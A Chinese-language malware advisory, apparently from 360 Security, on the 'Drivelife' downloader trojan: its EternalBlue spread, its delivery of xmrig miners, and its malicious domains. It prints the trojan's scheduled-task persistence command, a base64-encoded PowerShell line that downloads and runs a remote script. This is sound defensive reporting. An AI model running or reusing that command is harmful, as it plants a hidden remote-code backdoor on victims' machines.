“驱动人生”下载器木马再次更新！

根据360网络安全研究院提供的线索，通过驱动人生升级通道下发并通过“永恒之蓝”传播的下载器木马在2018年年末再次进行更新。2018年12月29日之后，该木马通过hxxp://d.haqo.net下发挖矿木马xmrig-32.mlz或xmrig-64.mlz。

hxxp://d.haqo.net这个域名是从2018年12月29日开始解析的，之后就一直作为挖矿木马的下载地址存在。在此之前，下载器木马一直通过hxxp://dl.haqo.net下发“永恒之蓝“传播模块。显而易见，攻击者手里已经控制了大量肉鸡，认为下发挖矿木马牟利的时机已经成熟。

值得一提的是，挖矿木马连接的矿池域名的其中两个域名loop.haqo.net和loop2.haqo.net 在2018年12月15日就开始解析（12月15日是驱动人生升级通道劫持攻击爆发的第二天），也就是说攻击者早就预谋要通过挖矿牟利，但由于各安全厂商的预警导致攻击者将这一计划推迟了半个月。

“驱动人生”下载器木马前情提要

2018年12月14日 下午

360互联网安全中心监控到一批通过 “人生日历”升级组件下发的下载器木马，该木马具备远程代码执行功能。木马启动后会将用户计算机的详细信息发往木马服务器，并接收远程指令执行下一步操作，木马同时还携带有永恒之蓝漏洞攻击组件，通过永恒之蓝漏洞攻击局域网与互联网中其它机器。360安全卫士已在第一时间查杀该木马， 360安全卫士具备永恒之蓝漏洞免疫功能，使用360安全卫士的用户不受该木马影响。我们也在第一时间将情况提交厂商处理。

2018年12月19日 上午

“永恒之蓝”下载器木马再次更新。此次更新通过服务器调整云控指令，实现对木马下载模块的更新，这也体现出了此类下载器木马的灵活性—可随时更新木马组件。下图是新的攻击模块下载地址：

更新的文件为14日的“永恒之蓝”漏洞攻击组件，保留了之前永恒之蓝漏洞攻击的模块，新增加一个powershell后门，同时更新了木马程序落地的名称。

其中powershell的后门通过注册一个计划任务实现：

命令行：C:WINDOWSsystem32cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:05:00 /tn MicrosoftwindowsBluetooths /tr powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcgAuAG0AaQBuAGkAYwBlAG4ALgBnAGEALwByAD8AcAAnACkA /F

解码之后，利用powershell执行这一段脚本：'hxxp://r.minicen.ga/r?p'

那时这个域名刚刚注册，并没有做解析

安全专家建议

为保证用户使用电脑的安全，我们建议您使用安全软件，并在使用电脑时保持安全软件处于开启状态，对电脑实时防护。

此外，360安全卫士接入安全大脑后，对此类木马及其后门可在第一时间提供预警，防护和查杀，守护您的安全。【来源：360安全卫士】
更多资讯详见：360社区早报（2019-1-10）